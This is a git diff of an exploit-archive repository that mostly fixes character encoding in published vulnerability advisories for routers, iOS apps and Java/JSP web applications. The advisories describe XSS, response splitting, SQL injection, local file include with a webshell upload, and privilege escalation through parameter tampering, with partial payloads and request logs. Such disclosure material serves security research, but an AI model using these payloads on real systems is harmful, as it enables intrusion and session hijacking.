Group MatchGroup Match @@ -158,7 +158,7 @@ cellpadding="0" cellspacing="0">?????
Pattern
a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]">
+name="0" type="button">
@@ -175,10 +175,10 @@ If the check box is cleared, only one list item may match. Default: Off?????Name​​​​​NameGroup Match -a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]">a%20>"?????<[PERSISTENT INJECTED SCRIPT CODE!]"> +a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]">a%20>"​​​​​<[PERSISTENT INJECTED SCRIPT CODE!]"> @@ -305,7 +305,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + Copyright � 2014 | Vulnerability Laboratory [Evolution Security] diff --git a/platforms/hardware/webapps/32943.txt b/platforms/hardware/webapps/32943.txt index 73cdf9548..d5a365e5b 100755 --- a/platforms/hardware/webapps/32943.txt +++ b/platforms/hardware/webapps/32943.txt @@ -2,11 +2,11 @@ # Date: 20-04-2014 # Author: Rakesh S # Software Link: http://www.teracom.in/ -# Version: T2-B-Gawv1.4U10Y-BI +# Version:  T2-B-Gawv1.4U10Y-BI The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password. - +  The exploitation example below changes password for the SSID: - - +  +  Submit \ No newline at end of file diff --git a/platforms/hardware/webapps/33129.html b/platforms/hardware/webapps/33129.html index 6a864f064..562eecbc1 100755 --- a/platforms/hardware/webapps/33129.html +++ b/platforms/hardware/webapps/33129.html @@ -1,4 +1,4 @@ -?? -
?berliefern
+
�berliefern
- <./[LOCAL FILE INCLUDE VULNERABILITY!].TXT" class="document" onclick="aClickHandler(this);" style="position:relative; text-decoration:none;">?????
>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT



+ <./[LOCAL FILE INCLUDE VULNERABILITY!].TXT" class="document" onclick="aClickHandler(this);" style="position:relative; text-decoration:none;">​​​​​
>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT



?2011- Wi-Fi Manager

+

1

�2011- Wi-Fi Manager

--- PoC Session Logs [GET] (EXEC CGI) --- Status: 200[OK] - GET http://ipad.localhost:8080/cgi/newfolder/[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E?0.7475382169664659 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[12] Mime Type[application/x-unknown-content-type] + GET http://ipad.localhost:8080/cgi/newfolder/[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E?0.7475382169664659 Load Flags[LOAD_BACKGROUND ] Gr��e des Inhalts[12] Mime Type[application/x-unknown-content-type] Request Header: Host[ipad.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] @@ -131,7 +131,7 @@ Status: 200[OK] Connection[close] Status: 200[OK] -GET http://ipad.localhost:8080/[CODE EXECUTION IN DIRECTORY PATH VALUE!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[916] Mime Type[application/x-unknown-content-type] +GET http://ipad.localhost:8080/[CODE EXECUTION IN DIRECTORY PATH VALUE!] Load Flags[LOAD_DOCUMENT_URI ] Gr��e des Inhalts[916] Mime Type[application/x-unknown-content-type] Request Header: Host[ipad.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] @@ -190,7 +190,7 @@ Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisorie is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + Copyright � 2014 | Vulnerability Laboratory [Evolution Security] diff --git a/platforms/ios/webapps/34816.txt b/platforms/ios/webapps/34816.txt index 20f2674f7..250ac9f6a 100755 --- a/platforms/ios/webapps/34816.txt +++ b/platforms/ios/webapps/34816.txt @@ -51,7 +51,7 @@ Published Affected Product(s): ==================== Golden Soft -Product: Foto ?bertr?ger - iOS Mobile Web Application 3.0 +Product: Foto �bertr�ger - iOS Mobile Web Application 3.0 Exploitation Technique: @@ -146,7 +146,7 @@ PoC: Exploit Photo Transfer.htm --- PoC Session Logs [POST] --- Status: 200[OK] -POST http://localhost/uploadPhotoPost Load Flags[LOAD_BYPASS_CACHE ] Gr??e des Inhalts[7] Mime Type[application/x-unknown-content-type] +POST http://localhost/uploadPhotoPost Load Flags[LOAD_BYPASS_CACHE ] Gr��e des Inhalts[7] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] @@ -171,7 +171,7 @@ Content-Type: image/png Status: 200[OK] -GET http://localhost/main/home Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[210] Mime Type[application/x-unknown-content-type] +GET http://localhost/main/home Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr��e des Inhalts[210] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] @@ -228,7 +228,7 @@ Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisorie is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + Copyright � 2014 | Vulnerability Laboratory [Evolution Security] -- diff --git a/platforms/ios/webapps/34957.txt b/platforms/ios/webapps/34957.txt index 980de4160..baeea68bc 100755 --- a/platforms/ios/webapps/34957.txt +++ b/platforms/ios/webapps/34957.txt @@ -56,7 +56,7 @@ Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. -Between December 49, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation +Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] @@ -128,7 +128,7 @@ Vulnerable Software(s): Vulnerable Module(s): [+] API Affected Module(s): - [+] Login Verification (Auth) + [+] Login Verification – (Auth) Proof of Concept (PoC): @@ -180,8 +180,8 @@ Resource(s): ../Paypal Mobile API Auth Bypass Restriction.wmv Picture(s): - ../1.jpg 11.jpg - ../1.png + ../1.jpg – 11.jpg + ../1.png – Solution - Fix & Patch: @@ -227,7 +227,7 @@ Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisorie is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright 2014 | Vulnerability Laboratory [Evolution Security] + Copyright © 2014 | Vulnerability Laboratory [Evolution Security] diff --git a/platforms/ios/webapps/34981.txt b/platforms/ios/webapps/34981.txt index 3ac7e0daf..bf90b4e92 100755 --- a/platforms/ios/webapps/34981.txt +++ b/platforms/ios/webapps/34981.txt @@ -26,7 +26,7 @@ Common Vulnerability Scoring System: Product & Service Introduction: =============================== Find jobs using Indeed, the most comprehensive search engine for jobs. In a single search, Indeed offers free access to millions of jobs from thousands of -company websites and job boards. From search to apply, Indeeds Job Search app helps you through the entire process of finding a new job. Since 2004, Indeed +company websites and job boards. From search to apply, Indeed’s Job Search app helps you through the entire process of finding a new job. Since 2004, Indeed has given job seekers free access to millions of jobs from thousands of company websites and job boards. As the leading pay-for-performance recruitment advertising network, Indeed drives millions of targeted applicants to jobs in every field and is the most cost-effective source of candidates for thousands of companies. We take our security very seriously and welcome any responsible disclosure of potential gaps in our systems. @@ -106,11 +106,11 @@ Affected Module(s): A client-side cross site scripting vulnerability has been discovered in the official Indeed.com `Job Search` v2.5 mobile web-application (api). The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions informaton by client-side cross site scripting requests. -The vulnerability is located in the `Empfnger` input of the `Job Suche > Whle Job Angebot` module. Local low privileged user accounts are able to inject -script codes to the empfnger input field of the iOS application. The result is a client-side script code execution in the context of the main job result +The vulnerability is located in the `Empfänger` input of the `Job Suche > Wähle Job Angebot` module. Local low privileged user accounts are able to inject +script codes to the empfänger input field of the iOS application. The result is a client-side script code execution in the context of the main job result next to the page bottom. The attack vector is non persistent and the method to inject the malicious code is POST. During the test we used js, html tags and php code to exploit the issue and verify. The execution of the injected code occurs directly after the request through the api at the bottom of the job -article page next to the vulnerable `Empfnger` input. +article page next to the vulnerable `Empfänger` input. The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6. Exploitation of the security issue requires low user inter action and no privileged mobile web application user account. Successful exploitation of the security vulnerability results in @@ -123,13 +123,13 @@ Request Method(s): [+] POST Vulnerable Module(s): - [+] Job Suche > Whle Job Angebot + [+] Job Suche > Wähle Job Angebot Vulnerable Input(s): - [+] Empfnger + [+] Empfänger Affected Module(s): - [+] Job Suche > Job Angebot (Bottom > Empfnger) + [+] Job Suche > Job Angebot (Bottom > Empfänger) Proof of Concept (PoC): @@ -168,8 +168,8 @@ high user interaction. For security demonstration or to reproduce the vulnerabil 3. Login to the account 4. Open the main job search module and search for any existing job name 5. Click the exisiting job article and scroll down to the page bottom -Note: The application uses the `Empfnger` to notify users and the seeker -6. Inject to the `Empfnger` input field your own payload and save by usage of send +Note: The application uses the `Empfänger` to notify users and the seeker +6. Inject to the `Empfänger` input field your own payload and save by usage of send 7. The code execution occurs directly next to the vulnerable input field Note: The context through the mobile api gets wrong validated which results in the client-side execution of code 8. Successful reproduce of the client-side vulnerability! @@ -201,7 +201,7 @@ The first issue can be patched by a secure parse and encode of the results page Filter and restrict the input of the search through the mobile ios api to prevent further persistent and non persistent attacks. 1.2 -To parse the second vulnerability it is required the encode the Empfnger input field which is present in every job article. The input needs to be parse the value +To parse the second vulnerability it is required the encode the Empfänger input field which is present in every job article. The input needs to be parse the value to ensure attackers are not able to execute client-side attacks against customers to compromise (hijack) session information. maybe it is wise to implement in the mobile api and app a new exception for invalid requests. @@ -212,7 +212,7 @@ Security Risk: The security risk of the persistent and non-persistent input validation web vulnerability in the result page is estimated as medium. 1.2 -The security risk of the non-persistent cross site scripting web vulnerability in the `empfnger` value is estimated as medium(-). +The security risk of the non-persistent cross site scripting web vulnerability in the `empfänger` value is estimated as medium(-). Credits & Authors: @@ -242,7 +242,7 @@ Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisorie is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright 2014 | Vulnerability Laboratory [Evolution Security] + Copyright © 2014 | Vulnerability Laboratory [Evolution Security] diff --git a/platforms/ios/webapps/35037.txt b/platforms/ios/webapps/35037.txt index d46637283..d8cdb84a1 100755 --- a/platforms/ios/webapps/35037.txt +++ b/platforms/ios/webapps/35037.txt @@ -26,7 +26,7 @@ Common Vulnerability Scoring System: Product & Service Introduction: =============================== iFunBox is a powerful file transfer and manage tool. You can use it to transfer files between Apple devices. -Its also a full-function file explorer, with user-friendly UI and simple operations. +It’s also a full-function file explorer, with user-friendly UI and simple operations. (Copy of the Homepage: https://itunes.apple.com/de/app/ifunbox-free/id882209383 ) @@ -129,7 +129,7 @@ class="file">Musicsdirdir????? +​​​​​ Delete
"><[PERSISTENT INJECTED SCRIPT CODE!]);">
?????? +display: inline-block;"> "><[PERSISTENT INJECTED SCRIPT CODE!]);">
?​​​​​ @@ -132,7 +132,7 @@ inline-block;">
Delete
--- PoC Session Logs [POST] --- Status: 200[OK] -GET http://localhost/?action=directory&path=%3Ciframe%20src%3Dhttp://www.vulnerability-lab.com%3E Load Flags[LOAD_BACKGROUND ] Gre des Inhalts[2] Mime Type[application/json] +GET http://localhost/?action=directory&path=%3Ciframe%20src%3Dhttp://www.vulnerability-lab.com%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[2] Mime Type[application/json] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] @@ -150,7 +150,7 @@ GET http://localhost/?action=directory&path=%3Ciframe%20src%3Dhttp://www.vulnera Date[Tue, 21 Oct 2014 15:42:33 GMT] Status: 200[OK] -GET http://localhost/?action=list Load Flags[LOAD_BACKGROUND ] Gre des Inhalts[491] Mime Type[application/json] +GET http://localhost/?action=list Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[491] Mime Type[application/json] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] @@ -168,7 +168,7 @@ GET http://localhost/?action=list Load Flags[LOAD_BACKGROUND ] Gr Date[Tue, 21 Oct 2014 15:42:34 GMT] Status: 200[OK] -GET http://localhost/[PERSISTENT INJECTED SCRIPT CODE!] Load Flags[LOAD_DOCUMENT_URI ] Gre des Inhalts[0] Mime Type[application/x-unknown-content-type] +GET http://localhost/[PERSISTENT INJECTED SCRIPT CODE!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] @@ -226,7 +226,7 @@ Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisorie is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright 2014 | Vulnerability Laboratory - [Evolution Security GmbH] + Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ diff --git a/platforms/ios/webapps/35775.txt b/platforms/ios/webapps/35775.txt index d48891f4b..07fe06177 100755 --- a/platforms/ios/webapps/35775.txt +++ b/platforms/ios/webapps/35775.txt @@ -143,7 +143,7 @@ PoC: Index of Documents (Name) --- PoC Session Logs [POST] (File Include > Upload)--- Status: 200[OK] -POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gre des Inhalts[3624] Mime Type[application/x-unknown-content-type] +POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent @@ -161,7 +161,7 @@ Content-Type: image/png --- PoC Session Logs [GET] (File Dir Index List)--- 13:54:26.427[48ms][total 48ms] Status: 200[OK] -GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Gre des Inhalts[142] Mime Type[application/x-unknown-content-type] +GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] @@ -195,7 +195,7 @@ PoC: Index of Documents --- PoC Session Logs [POST] --- 14:03:16.481[149ms][total 1583ms] Status: 200[OK] -POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gre des Inhalts[3883] Mime Type[application/x-unknown-content-type] +POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] @@ -217,7 +217,7 @@ http://localhost:8888/./webshell.png.html.php Solution - Fix & Patch: ======================= 1.1 -The file include vulnerability can be patched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request. +The file include vulnerability can be paütched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request. Restrict the filename input and filter with an own set exception to prevent application-side attacks. Parse also in the Index of Documents the vulnerable name output value to solve the issue. @@ -262,7 +262,7 @@ Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisorie is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright 2015 | Vulnerability Laboratory - [Evolution Security GmbH] + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- diff --git a/platforms/java/webapps/32821.html b/platforms/java/webapps/32821.html index 73f179456..2b72d63ca 100755 --- a/platforms/java/webapps/32821.html +++ b/platforms/java/webapps/32821.html @@ -4,4 +4,4 @@ APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerabi An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. -1 XSS: GET /security/applet?referrer=>"'> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: ??~B, 25 ?~A?? 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html \ No newline at end of file +1 XSS: GET /security/applet?referrer=>"'> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: Ч�~B, 25 �~Aен 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html \ No newline at end of file diff --git a/platforms/java/webapps/36548.txt b/platforms/java/webapps/36548.txt index 93ce9d06d..6bfd33863 100755 --- a/platforms/java/webapps/36548.txt +++ b/platforms/java/webapps/36548.txt @@ -4,4 +4,4 @@ Contus Job Portal is prone to an SQL-injection vulnerability because it fails to A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/demo/jobresult?searchname=quickjobsearch&Keywords=&Location=&Category=16??A \ No newline at end of file +http://www.example.com/demo/jobresult?searchname=quickjobsearch&Keywords=&Location=&Category=16â??A \ No newline at end of file diff --git a/platforms/jsp/remote/18179.html b/platforms/jsp/remote/18179.html index bfc90dbe3..2d0760aea 100755 --- a/platforms/jsp/remote/18179.html +++ b/platforms/jsp/remote/18179.html @@ -2,9 +2,9 @@ # Date:30/11/2011 # Author: Alexey Sintsov # Software Link: http://www.ibm.com/ -# Version:8.5.3/8.5.2 FP3 (0day) +# Version:8.5.3/8.5.2 FP3 (0day)  # Tested on: Windows 7 / Windows 2008 -# CVE :CVE-2011-1519 +# CVE : CVE-2011-1519 Application: IBM Lotus Domino Controller @@ -12,7 +12,7 @@ Versions Affected: <=8.5.2 FP3, <=8.5.3 Manager 4.0 prior to Update 4 (0day) Vendor URL: http://ibm.com -Bug: own XML parser +Bug: own XML parser   CVE: CVE-2011-1519 CVSS2: 9.0 Exploits: YES @@ -23,7 +23,7 @@ Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com) This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug, but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day. -Details you can read there:http://dsecrg.com/pages/pub/show.php?id=41 +Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41 EXPLOIT: @@ -70,4 +70,4 @@ height = "99%" - \ No newline at end of file +  \ No newline at end of file diff --git a/platforms/jsp/webapps/10061.txt b/platforms/jsp/webapps/10061.txt index 0d678e736..452df5c26 100755 --- a/platforms/jsp/webapps/10061.txt +++ b/platforms/jsp/webapps/10061.txt @@ -4,4 +4,4 @@ The following example URIs are available: https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14">8b3283a1e57 -https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a">2aa99b60533&iaction=precreatefcb14">8b3283a1e57 \ No newline at end of file +https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a">2aa99b60533&iaction=precreatefcb14">8b3283a1e57 \ No newline at end of file diff --git a/platforms/jsp/webapps/11324.txt b/platforms/jsp/webapps/11324.txt index f43407af5..7c8dcb4b8 100755 --- a/platforms/jsp/webapps/11324.txt +++ b/platforms/jsp/webapps/11324.txt @@ -12,11 +12,11 @@ Affected Platforms: Multiple Local / Remote: Remote -Severity: Medium CVSS: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) +Severity: Medium – CVSS: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) -Researcher: Nahuel Grisola +Researcher: Nahuel Grisolía -Vendor Status: Still Vulnerable No Patch Available at the moment +Vendor Status: Still Vulnerable – No Patch Available at the moment Vulnerability Description: A permanent Cross Site Scripting vulnerability was found in Hipergate 4.0.12, because the application @@ -24,7 +24,7 @@ fails to sanitize user-supplied input. Any logged-in user who is able to add a N the vulnerability. Proof of Concept: -* Add as a new campaign. +* Add as a new campaign. Impact: @@ -52,11 +52,11 @@ Affected Platforms: Multiple Local / Remote: Remote -Severity: Medium CVSS: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) +Severity: Medium – CVSS: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) -Researcher: Nahuel Grisola +Researcher: Nahuel Grisolía -Vendor Status: Still Vulnerable No Patch Available at the moment +Vendor Status: Still Vulnerable – No Patch Available at the moment Vulnerability Description: @@ -96,11 +96,11 @@ Affected Platforms: Multiple Local / Remote: Remote -Severity: High CVSS: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) +Severity: High – CVSS: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) -Researcher: Nahuel Grisola +Researcher: Nahuel Grisolía -Vendor Status: Still Vulnerable No Patch Available at the moment +Vendor Status: Still Vulnerable – No Patch Available at the moment Vulnerability Description: A vulnerability has been discovered in Hipergate, which can be exploited by malicious people to diff --git a/platforms/jsp/webapps/11793.txt b/platforms/jsp/webapps/11793.txt index 72c9b3969..4daf1993c 100755 --- a/platforms/jsp/webapps/11793.txt +++ b/platforms/jsp/webapps/11793.txt @@ -4,8 +4,8 @@ Release Date: 03-18-2010 Affected Applications: Confirmed in version 7.6. Other versions may also be affected. Affected Platforms: Multiple Local / Remote: Remote -Severity: High CVSS: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) -Researcher: Nahuel Grisola +Severity: High – CVSS: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) +Researcher: Nahuel Grisolía Vendor Status: Acknowledged. Not fixed. Vulnerability Description: @@ -41,7 +41,7 @@ then browse, http://x.x.x.x:8080/images/passwd.txt Impact: Execute arbitrary SQL queries. Solution: Not fixed. Vendor Response: -First contact on January 12, 2010. Last contact on March 15, 2010. They wont fix this issue in the upcoming hotfix. I consider that 2 months is a really long time to fix this kind of High priority issue. +First contact on January 12, 2010. Last contact on March 15, 2010. They won’t fix this issue in the upcoming hotfix. I consider that 2 months is a really long time to fix this kind of High priority issue. The vendor knows that this advisory will be released. No more contact since then. diff --git a/platforms/jsp/webapps/15290.txt b/platforms/jsp/webapps/15290.txt index dac1e5b57..17c8754f2 100755 --- a/platforms/jsp/webapps/15290.txt +++ b/platforms/jsp/webapps/15290.txt @@ -2,7 +2,7 @@ Description Security-Assessment.com discovered that is possible to successfully perform an HTTP Response Splitting attack against applications served by Sun Java System Web Server. The vulnerability can be exploited if user supplied input is used to generate the value of an HTTP header, as shown in the test.jsp page below: -test.jsp Source Code +test.jsp – Source Code test @@ -21,7 +21,7 @@ In this advisory, we will cover description of a Cross Site Scripting attack. Th GET /test.jsp?ref=http://my.test.domain.com/%0D%0AContent- type:+text/html;%0D%0A%0D%0ATEST%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 -By inserting CR and LF characters in the ref HTTP parameter, it is possible to split the HTTP response from the server as shown in the following table: +By inserting CR and LF characters in the “ref” HTTP parameter, it is possible to split the HTTP response from the server as shown in the following table: HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 @@ -46,7 +46,7 @@ http://sunsolve.sun.com/search/document.do?assetkey=1-79-1215353.1-1 http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html#AppendixSUNS About Security-Assessment.com -Security-Assessment.com is Australasias leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. +Security-Assessment.com is Australasia’s leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. diff --git a/platforms/jsp/webapps/17437.txt b/platforms/jsp/webapps/17437.txt index 3a914af2b..474308b2b 100755 --- a/platforms/jsp/webapps/17437.txt +++ b/platforms/jsp/webapps/17437.txt @@ -12,7 +12,7 @@ based helpdesk system written in Java. The vulnerability can be exploited to access local files by entering special characters in variables used to create file paths. The attackers -use ?../? sequences to move up to root directory, thus permitting +use �../� sequences to move up to root directory, thus permitting navigation through the file system. Request: diff --git a/platforms/jsp/webapps/17897.txt b/platforms/jsp/webapps/17897.txt index 8a337c0c9..1e2a77ce9 100755 --- a/platforms/jsp/webapps/17897.txt +++ b/platforms/jsp/webapps/17897.txt @@ -6,35 +6,35 @@ # Version: All # Tested on: Apache-Coyote/1.1 # CVE : CVE-2011-3645 -? +� --------------------------------------------------- "Omnidocs" Multiple vulnerability. --------------------------------------------------- -By ? ? ? :Sohil Garg -Email ? ?:sohil_garg@yahoo.co.in +By � � � :Sohil Garg +Email � �:sohil_garg@yahoo.co.in --------------------------------------------------- -? +� Product Description: -OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and? +OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and� contents. Also integrates seamlessly with other enterprise applications. -? +� ------------------ Vulnerability ------------------ -? +� 1.Vulnerbility Type Privilege escalation -Affected URL:? +Affected URL:� http://serverIP/omnidocs/doccab/doclist.jsp?DocListFolderId=927964&FolderType=G&FolderRights=010000000&FolderName=1234&FolderOwner=test&FolderLocation=G&Fold erAccessType=I&ParentFolderIndex=100&FolderPathFlag=Y&Fetch=5&VolIndex=1&VolIndex=1 -? -Vulnerable Parameter:? +� +Vulnerable Parameter:� FolderRights Exploit -Omnidocs application does not validate 'FolderRights' parameter. This parameter could be modified to '111111111' to get full access including rights to add? +Omnidocs application does not validate 'FolderRights' parameter. This parameter could be modified to '111111111' to get full access including rights to add� documents, add folders, delete folders and place orders. @@ -49,7 +49,7 @@ Vulnerable Parameter: UserIndex Exploit: -Omnidocs application does not validate 'UserIndex' parameter. 'UserIndex' parameter is used to access the personal setting page. This parameter can be? +Omnidocs application does not validate 'UserIndex' parameter. 'UserIndex' parameter is used to access the personal setting page. This parameter can be� changed to other valid numbers thereby gaining access to view or change other user's personal settings. diff --git a/platforms/jsp/webapps/18260.txt b/platforms/jsp/webapps/18260.txt index f8f6b7571..c4b67ed02 100755 --- a/platforms/jsp/webapps/18260.txt +++ b/platforms/jsp/webapps/18260.txt @@ -134,7 +134,7 @@ may not apply. Any modified copy or reproduction, including partially usages, of Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. - Copyright ? 2011|Vulnerability-Lab + Copyright � 2011|Vulnerability-Lab diff --git a/platforms/jsp/webapps/18416.txt b/platforms/jsp/webapps/18416.txt index 7dab21bff..6f4d88521 100755 --- a/platforms/jsp/webapps/18416.txt +++ b/platforms/jsp/webapps/18416.txt @@ -1,6 +1,6 @@ Stoneware WebNetwork6 Vulnerability Assessment -* CVE-2012-0285 XSS +* CVE-2012-0285 – XSS * CVE-2012-0286 - CSRF Conducted by: @@ -12,12 +12,12 @@ Conducted for: * Stoneware INC. (Discovered Zero Day vulnerabilities reported to support in 11/2011 & 12/2011) Date(s) Conducted: -* 11/2011 Started initial Web application penetration testing -* 12/29/2011 Started testing of Stonewares beta SP8 patch to resolve zero day vulnerabilities +* 11/2011 – Started initial Web application penetration testing +* 12/29/2011 – Started testing of Stoneware’s beta SP8 patch to resolve zero day vulnerabilities - Executive Summary -The following reports details the findings from the security assessment performed by Jacob Holcomb of Leland Public Schools 